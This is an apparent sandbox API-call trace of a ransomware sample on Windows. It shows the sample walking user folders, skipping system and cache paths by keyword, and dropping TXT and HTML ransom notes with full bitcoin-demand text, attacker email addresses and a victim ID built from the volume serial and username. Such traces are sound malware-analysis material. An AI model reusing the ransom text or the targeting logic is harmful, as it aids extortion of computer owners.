	[0167.337] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0167.337] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\device stage\\*.*", lpSrch="$recycle.bin") returned 0x0
	[0167.338] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0167.338] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\device stage\\*.*", lpSrch="temp") returned 0x0
	[0167.338] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0167.338] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\device stage\\*.*", lpSrch="program files") returned 0x0
	[0167.338] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0167.338] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\device stage\\*.*", lpSrch="program files (x86)") returned 0x0
	[0167.339] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0167.339] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\device stage\\*.*", lpSrch="appdata") returned 0x0
	[0167.339] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0167.339] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\device stage\\*.*", lpSrch="application data") returned 0x0
	[0167.339] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0167.340] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\device stage\\*.*", lpSrch="winnt") returned 0x0
	[0167.340] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0167.340] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\device stage\\*.*", lpSrch="tmp") returned 0x0
	[0167.340] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0167.340] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\device stage\\*.*", lpSrch="cache") returned 0x0
	[0167.340] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0167.340] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\device stage\\*.*", lpSrch="temporary internet files") returned 0x0
	[0167.341] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0167.341] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\device stage\\*.*", lpSrch="webcache") returned 0x0
	[0167.341] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0167.341] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\device stage\\*.*", lpSrch="inetcache") returned 0x0
	[0167.341] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0167.341] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\device stage\\*.*", lpSrch="nvidia") returned 0x0
	[0167.342] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0167.342] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\device stage\\*.*", lpSrch="packages") returned 0x0
	[0167.342] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0167.342] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\device stage\\*.*", lpSrch="cookies") returned 0x0
	[0167.342] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0167.342] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\device stage\\*.*", lpSrch="programdata") returned 0x0
	[0167.343] lstrcmpW (lpString1=".", lpString2="..") returned -1
	[0167.343] lstrcmpW (lpString1=".", lpString2=".") returned 0
	[0167.343] FindNextFileW (in: hFindFile=0xfb98f0, lpFindFileData=0x18bba4 | out: lpFindFileData=0x18bba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xcdfeea, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xcdfeea, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0x7d42abd7, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1
	[0167.343] lstrcmpW (lpString1="..", lpString2="..") returned 0
	[0167.343] FindNextFileW (in: hFindFile=0xfb98f0, lpFindFileData=0x18bba4 | out: lpFindFileData=0x18bba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xcdfeea, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xcdfeea, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xcdfeea, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Device", cAlternateFileName="")) returned 1
	[0167.358] lstrcmpW (lpString1="Device", lpString2="..") returned 1
	[0167.359] lstrcmpW (lpString1="Device", lpString2=".") returned 1
	[0167.359] lstrcpyW (in: lpString1=0x18b58c, lpString2="C:\\Users\\All Users\\Microsoft\\Device Stage" | out: lpString1="C:\\Users\\All Users\\Microsoft\\Device Stage") returned="C:\\Users\\All Users\\Microsoft\\Device Stage"
	[0167.359] lstrcatW (in: lpString1="C:\\Users\\All Users\\Microsoft\\Device Stage", lpString2="\\" | out: lpString1="C:\\Users\\All Users\\Microsoft\\Device Stage\\") returned="C:\\Users\\All Users\\Microsoft\\Device Stage\\"
	[0167.360] lstrcatW (in: lpString1="C:\\Users\\All Users\\Microsoft\\Device Stage\\", lpString2="Device" | out: lpString1="C:\\Users\\All Users\\Microsoft\\Device Stage\\Device") returned="C:\\Users\\All Users\\Microsoft\\Device Stage\\Device"
	[0167.360] lstrcpyW (in: lpString1=0x18aa84, lpString2="C:\\Users\\All Users\\Microsoft\\Device Stage\\Device" | out: lpString1="C:\\Users\\All Users\\Microsoft\\Device Stage\\Device") returned="C:\\Users\\All Users\\Microsoft\\Device Stage\\Device"
	[0167.360] lstrcatW (in: lpString1="C:\\Users\\All Users\\Microsoft\\Device Stage\\Device", lpString2="\\" | out: lpString1="C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\") returned="C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\"
	[0167.360] lstrcpyW (in: lpString1=0x18a674, lpString2="C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\" | out: lpString1="C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\") returned="C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\"
	[0167.360] lstrcatW (in: lpString1="C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\", lpString2="*.*" | out: lpString1="C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\*.*") returned="C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\*.*"
	[0167.360] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\*.*" (normalized: "c:\\users\\all users\\microsoft\\device stage\\device\\*.*"), lpFindFileData=0x18ae94 | out: lpFindFileData=0x18ae94*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xcdfeea, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xcdfeea, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xcdfeea, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xfb9b30
	[0167.361] lstrlenW (lpString="C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\*.*") returned 52
	[0167.361] LoadLibraryA (lpLibFileName="user32.dll") returned 0x76950000
	[0167.361] CharLowerBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\*.*", cchLength=0x34 | out: lpsz="c:\\users\\all users\\microsoft\\device stage\\device\\*.*") returned 0x34
	[0167.361] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0167.362] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\device stage\\device\\*.*", lpSrch="windows") returned 0x0
	[0167.362] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0167.362] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\device stage\\device\\*.*", lpSrch="boot") returned 0x0
	[0167.362] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0167.362] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\device stage\\device\\*.*", lpSrch="system volume information") returned 0x0
	[0167.362] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0167.362] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\device stage\\device\\*.*", lpSrch="$recycle.bin") returned 0x0
	[0167.363] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0167.363] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\device stage\\device\\*.*", lpSrch="temp") returned 0x0
	[0167.363] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0167.363] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\device stage\\device\\*.*", lpSrch="program files") returned 0x0
	[0167.363] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0167.363] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\device stage\\device\\*.*", lpSrch="program files (x86)") returned 0x0
	[0167.363] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0167.364] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\device stage\\device\\*.*", lpSrch="appdata") returned 0x0
	[0167.364] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0167.364] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\device stage\\device\\*.*", lpSrch="application data") returned 0x0
	[0167.364] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0167.364] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\device stage\\device\\*.*", lpSrch="winnt") returned 0x0
	[0167.364] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0167.365] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\device stage\\device\\*.*", lpSrch="tmp") returned 0x0
	[0167.365] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0167.365] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\device stage\\device\\*.*", lpSrch="cache") returned 0x0
	[0167.365] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0167.365] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\device stage\\device\\*.*", lpSrch="temporary internet files") returned 0x0
	[0167.365] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0167.365] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\device stage\\device\\*.*", lpSrch="webcache") returned 0x0
	[0167.366] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0167.366] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\device stage\\device\\*.*", lpSrch="inetcache") returned 0x0
	[0167.366] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0167.366] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\device stage\\device\\*.*", lpSrch="nvidia") returned 0x0
	[0167.366] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0167.366] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\device stage\\device\\*.*", lpSrch="packages") returned 0x0
	[0167.367] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0167.367] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\device stage\\device\\*.*", lpSrch="cookies") returned 0x0
	[0167.367] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0167.367] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\device stage\\device\\*.*", lpSrch="programdata") returned 0x0
	[0167.367] FindNextFileW (in: hFindFile=0xfb9b30, lpFindFileData=0x18ae94 | out: lpFindFileData=0x18ae94*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xcdfeea, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xcdfeea, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xcdfeea, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1
	[0167.367] FindNextFileW (in: hFindFile=0xfb9b30, lpFindFileData=0x18ae94 | out: lpFindFileData=0x18ae94*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xcdfeea, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x358e05e, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0x358e05e, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="{113527a4-45d4-4b6f-b567-97838f1b04b0}", cAlternateFileName="{11352~1")) returned 1
	[0167.367] FindNextFileW (in: hFindFile=0xfb9b30, lpFindFileData=0x18ae94 | out: lpFindFileData=0x18ae94*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xcdfeea, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x358e05e, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0x358e05e, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="{8702d817-5aad-4674-9ef3-4d3decd87120}", cAlternateFileName="{8702D~1")) returned 1
	[0167.368] FindNextFileW (in: hFindFile=0xfb9b30, lpFindFileData=0x18ae94 | out: lpFindFileData=0x18ae94*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xcdfeea, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x358e05e, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0x358e05e, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="{8702d817-5aad-4674-9ef3-4d3decd87120}", cAlternateFileName="{8702D~1")) returned 0
	[0167.368] FindClose (in: hFindFile=0xfb9b30 | out: hFindFile=0xfb9b30) returned 1
	[0167.368] FindClose (in: hFindFile=0xfb9b30 | out: hFindFile=0xfb9b30) returned 0
	[0167.368] lstrcpyW (in: lpString1=0x18aa84, lpString2="C:\\Users\\All Users\\Microsoft\\Device Stage\\Device" | out: lpString1="C:\\Users\\All Users\\Microsoft\\Device Stage\\Device") returned="C:\\Users\\All Users\\Microsoft\\Device Stage\\Device"
	[0167.368] lstrcatW (in: lpString1="C:\\Users\\All Users\\Microsoft\\Device Stage\\Device", lpString2="\\*.*" | out: lpString1="C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\*.*") returned="C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\*.*"
	[0167.369] LoadLibraryExA (lpLibFileName="user32.dll", hFile=0x0, dwFlags=0x0) returned 0x76950000
	[0167.369] GetProcAddress (hModule=0x76950000, lpProcName="wsprintfW") returned 0x7697f890
	[0167.369] wsprintfW (in: param_1=0x18a370, param_2="%s\\HELP_DECRYPT_YOUR_FILES.TXT" | out: param_1="C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\HELP_DECRYPT_YOUR_FILES.TXT") returned 76
	[0167.369] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\HELP_DECRYPT_YOUR_FILES.TXT" (normalized: "c:\\users\\all users\\microsoft\\device stage\\device\\help_decrypt_your_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x388
	[0167.374] lstrlenW (lpString="NOT YOUR LANGUAGE? USE https://translate.google.com\r\n\r\nWhat happened to your files ?\r\nAll of your files were protected by a strong encryption with RSA-2048.\r\nMore information about the encryption keys using RSA-2048 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)\r\n\r\nHow did this happen ?\r\n!!! Specially for your PC was generated personal RSA-2048 KEY, both public and private.\r\n!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet.\r\n!!! Decrypting of your files is only possible with the help of the private key and decrypt program , which is on our Secret Server \r\n\r\nWhat do I do ?\r\nSo, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way.\r\nIf You have really valuable data, you better not waste your time, because there is no other way to get your files, except make a payment.\r\n\r\nFor more specific instructions:\r\nContact us by email only, send us an email along with your ID number and wait for further instructions. Our specialist will contact you within 12 hours. \r\nFor you to be sure, that we can decrypt your files - you can send us a single encrypted file and we will send you back it in a decrypted form. This will be your guarantee. \r\n\r\nPlease do not waste your time! You have 72 hours only! After that The Main Server will double your price!\r\nSo right now You have a chance to buy your individual private HardWare with a low price!\r\n\r\nE-MAIL1: enc2@usa.com\r\nE-MAIL2: enc2@dr.com\r\n\r\n") returned 1571
	[0167.376] WriteFile (in: hFile=0x388, lpBuffer=0x189728*, nNumberOfBytesToWrite=0xc46, lpNumberOfBytesWritten=0x18a64c, lpOverlapped=0x0 | out: lpBuffer=0x189728*, lpNumberOfBytesWritten=0x18a64c*=0xc46, lpOverlapped=0x0) returned 1
	[0167.378] CloseHandle (hObject=0x388) returned 1
	[0167.379] GetVolumeInformationA (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x0, lpVolumeSerialNumber=0x1896f8, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x1896f8*=0xc287f38, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1
	[0167.380] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0167.380] GetUserNameA (in: lpBuffer=0x1895dc, pcbBuffer=0x1896f4 | out: lpBuffer="RDhJ0CNFevzX", pcbBuffer=0x1896f4) returned 1
	[0167.381] wsprintfW (in: param_1=0x18a578, param_2="YOUR_ID: %x%x" | out: param_1="YOUR_ID: c287f3826d6e218") returned 24
	[0167.381] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\HELP_DECRYPT_YOUR_FILES.TXT" (normalized: "c:\\users\\all users\\microsoft\\device stage\\device\\help_decrypt_your_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x388
	[0167.381] SetFilePointer (in: hFile=0x388, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0xc46
	[0167.381] lstrlenW (lpString="YOUR_ID: c287f3826d6e218") returned 24
	[0167.381] WriteFile (in: hFile=0x388, lpBuffer=0x18a578*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x18a654, lpOverlapped=0x0 | out: lpBuffer=0x18a578*, lpNumberOfBytesWritten=0x18a654*=0x30, lpOverlapped=0x0) returned 1
	[0167.382] CloseHandle (hObject=0x388) returned 1
	[0167.382] LoadLibraryExA (lpLibFileName="user32.dll", hFile=0x0, dwFlags=0x0) returned 0x76950000
	[0167.382] GetProcAddress (hModule=0x76950000, lpProcName="wsprintfW") returned 0x7697f890
	[0167.383] GetProcAddress (hModule=0x76950000, lpProcName="wsprintfA") returned 0x769804a0
	[0167.383] wsprintfW (in: param_1=0x18a330, param_2="%s\\HELP_DECRYPT_YOUR_FILES.HTML" | out: param_1="C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\HELP_DECRYPT_YOUR_FILES.HTML") returned 77
	[0167.383] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\HELP_DECRYPT_YOUR_FILES.HTML" (normalized: "c:\\users\\all users\\microsoft\\device stage\\device\\help_decrypt_your_files.html"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x388
	[0167.383] lstrlenA (lpString="<!DOCTYPE html>\n\r<html>\n\r<head>\n\r<meta charset=\"utf-8\">\n\r<title>HELP_DECRYPT_YOUR_FILES</title>\n\r<style>\n\r.text {\n\r text-align:  center;\n\r}\n\r</style>\n\r</head>\n\r<body>\n\r<div class=\"text\">\n\r<strong>NOT YOUR LANGUAGE?</strong> USE <a href=\"https://translate.google.com\">https://translate.google.com</a><br><br>\n\r<strong>What happened to your files ?</strong><br>\n\rAll of your files were protected by a strong encryption with RSA-2048.<br>\n\rMore information about the encryption keys using RSA-2048 can be found here: <a href=\"http://en.wikipedia.org/wiki/RSA_(cryptosystem)\">http://en.wikipedia.org/wiki/RSA_(cryptosystem)</a><br><br>\n\r<strong>How did this happen ?</strong><br>\n\r!!! Specially for your PC was generated personal RSA-2048 KEY, both public and private.<br>\n\r!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet.<br>\n\r!!! Decrypting of your files is only possible with the help of the private key and decrypt program , which is on our Secret Server <br><br>\n\r<strong>What do I do ?</strong><br>\n\rSo, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way.<br>\n\rIf You have really valuable data, you better not waste your time, because there is no other way to get your files, except make a payment.<br><br>\n\r<strong>For more specific instructions:</strong><br>\n\rContact us by email only, send us an email along with your ID number and wait for further instructions. Our specialist will contact you within 12 hours. <br>\n\rFor you to be sure, that we can decrypt your files - you can send us a single encrypted file and we will send you back it in a decrypted form. This will be your guarantee. <br>\n\r\n\rPlease do not waste your time! You have 72 hours only! After that The Main Server will double your price!\r\nSo right now You have a chance to buy your individual private HardWare with a low price! <br>\r\n<strong>E-MAIL1:</strong>\x09enc2@usa.com<br>\n\r<strong>E-MAIL2:</strong>\x09enc2@dr.com<br>\n\r") returned 2056
	[0167.384] WriteFile (in: hFile=0x388, lpBuffer=0x189b24*, nNumberOfBytesToWrite=0x808, lpNumberOfBytesWritten=0x18a648, lpOverlapped=0x0 | out: lpBuffer=0x189b24*, lpNumberOfBytesWritten=0x18a648*=0x808, lpOverlapped=0x0) returned 1
	[0167.386] CloseHandle (hObject=0x388) returned 1
	[0167.386] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0167.386] GetVolumeInformationA (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x0, lpVolumeSerialNumber=0x189b0c, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x189b0c*=0xc287f38, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1
	[0167.387] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0167.387] GetUserNameA (in: lpBuffer=0x1899f0, pcbBuffer=0x189b08 | out: lpBuffer="RDhJ0CNFevzX", pcbBuffer=0x189b08) returned 1
	[0167.445] wsprintfA (in: param_1=0x18a538, param_2="<strong>YOUR_ID: %x%x</strong>\r\n</div>\r\n</body>\x09\n</html>" | out: param_1="<strong>YOUR_ID: c287f3826d6e218</strong>\r\n</div>\r\n</body>\x09\n</html>") returned 67
	[0167.445] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\HELP_DECRYPT_YOUR_FILES.HTML" (normalized: "c:\\users\\all users\\microsoft\\device stage\\device\\help_decrypt_your_files.html"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x388
	[0167.446] SetFilePointer (in: hFile=0x388, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x808
	[0167.446] lstrlenA (lpString="<strong>YOUR_ID: c287f3826d6e218</strong>\r\n</div>\r\n</body>\x09\n</html>") returned 67
	[0167.446] WriteFile (in: hFile=0x388, lpBuffer=0x18a538*, nNumberOfBytesToWrite=0x43, lpNumberOfBytesWritten=0x18a650, lpOverlapped=0x0 | out: lpBuffer=0x18a538*, lpNumberOfBytesWritten=0x18a650*=0x43, lpOverlapped=0x0) returned 1
	[0167.447] CloseHandle (hObject=0x388) returned 1
	[0167.447] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\*.*" (normalized: "c:\\users\\all users\\microsoft\\device stage\\device\\*.*"), lpFindFileData=0x18ae94 | out: lpFindFileData=0x18ae94*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xcdfeea, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xcdfeea, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0x7d4c379e, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xfb9b30
	[0167.448] lstrlenW (lpString="C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\*.*") returned 52
	[0167.448] LoadLibraryA (lpLibFileName="user32.dll") returned 0x76950000
	[0167.448] CharLowerBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\*.*", cchLength=0x34 | out: lpsz="c:\\users\\all users\\microsoft\\device stage\\device\\*.*") returned 0x34
	[0167.448] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0167.448] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\device stage\\device\\*.*", lpSrch="windows") returned 0x0
	[0167.449] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0167.449] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\device stage\\device\\*.*", lpSrch="boot") returned 0x0
	[0167.449] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0167.449] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\device stage\\device\\*.*", lpSrch="system volume information") returned 0x0
	[0167.449] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0167.449] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\device stage\\device\\*.*", lpSrch="$recycle.bin") returned 0x0
	[0167.450] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0167.450] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\device stage\\device\\*.*", lpSrch="temp") returned 0x0
	[0167.450] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0167.450] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\device stage\\device\\*.*", lpSrch="program files") returned 0x0
	[0167.450] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0167.450] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\device stage\\device\\*.*", lpSrch="program files (x86)") returned 0x0
	[0167.451] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0167.451] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\device stage\\device\\*.*", lpSrch="appdata") returned 0x0
	[0167.451] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0167.451] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\device stage\\device\\*.*", lpSrch="application data") returned 0x0
	[0167.451] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0167.451] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\device stage\\device\\*.*", lpSrch="winnt") returned 0x0
	[0167.452] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0167.452] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\device stage\\device\\*.*", lpSrch="tmp") returned 0x0
	[0167.452] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0167.452] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\device stage\\device\\*.*", lpSrch="cache") returned 0x0
	[0167.452] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0167.452] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\device stage\\device\\*.*", lpSrch="temporary internet files") returned 0x0
	[0167.453] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0167.453] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\device stage\\device\\*.*", lpSrch="webcache") returned 0x0
	[0167.454] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0167.454] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\device stage\\device\\*.*", lpSrch="inetcache") returned 0x0
	[0167.454] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0167.454] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\device stage\\device\\*.*", lpSrch="nvidia") returned 0x0
	[0167.454] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0167.454] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\device stage\\device\\*.*", lpSrch="packages") returned 0x0
	[0167.454] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
